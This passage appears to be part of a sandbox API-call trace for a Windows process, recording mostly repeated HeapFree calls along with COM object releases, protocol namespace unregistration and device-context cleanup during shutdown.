lpMem=0x68d2f8 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682b98 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63a868 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685968 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x679bc8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eb70 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6859e0 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685a30 | out: 
hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685918 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685a80 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67d058 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65cb18 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca58 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca48 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ca68 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68d5e8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650270 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68dc30 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650398 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6651b8 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b850 | out: hHeap=0x610000) returned 1 [0077.096] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6504d0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622e00 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66bec0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a798 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686fb8 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652528 | out: hHeap=0x610000) returned 1 [0077.097] 
HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652338 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650668 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a4f0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651018 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652240 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651fc0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a688 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x677338 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6940c0 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x694000 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x694180 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a188 | out: hHeap=0x610000) returned 1 [0077.097] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a0c0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x68d9d8 | out: hHeap=0x610000) returned 1 [0077.098] IUnknown:Release (This=0x65d270) returned 0x0 [0077.098] IUnknown:Release (This=0x642934) returned 0x0 [0077.098] IUnknown:Release (This=0x750296bc) returned 0x7fff [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d980 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) 
returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3e0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.098] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree 
(in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, 
lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.099] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) 
returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: 
hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 
| out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 
[0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64be70 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: 
hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bd70 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64ba20 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6293b0 | out: hHeap=0x610000) returned 1 [0077.259] IUnknown:Release (This=0x63eb00) returned 0x0 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247b0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649880 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643b90 | out: hHeap=0x610000) returned 1 [0077.260] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x76e40000 [0077.260] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0077.260] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.260] IInternetSession:UnregisterNameSpace (This=0x63ee70, pCF=0x75028c50, pszProtocol="res") returned 0x0 [0077.260] IUnknown:Release (This=0x75028c50) returned 0x1 [0077.260] IInternetSession:UnregisterNameSpace (This=0x63ee70, pCF=0x75028c70, pszProtocol="about") returned 0x0 [0077.260] IUnknown:Release (This=0x75028c70) returned 
0x1 [0077.260] IUnknown:Release (This=0x63ee70) returned 0x1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6335e8 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fa88 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6240e0 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f350 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fb00 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d0f0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624798 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bb48 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f600 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247c8 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6249a8 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e278 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f368 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6487c0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f2c0 | out: hHeap=0x610000) returned 1 [0077.261] IUnknown:Release (This=0x646678) returned 0x0 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x641ea0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: 
hHeap=0x610000, dwFlags=0x0, lpMem=0x63f188 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63e0c8 | out: hHeap=0x610000) returned 1 [0077.262] DeleteDC (hdc=0x3010a0f) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643508 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6434a0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629180 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643850 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643578 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6291d0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652f60 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629130 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629220 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65d208 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629270 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, 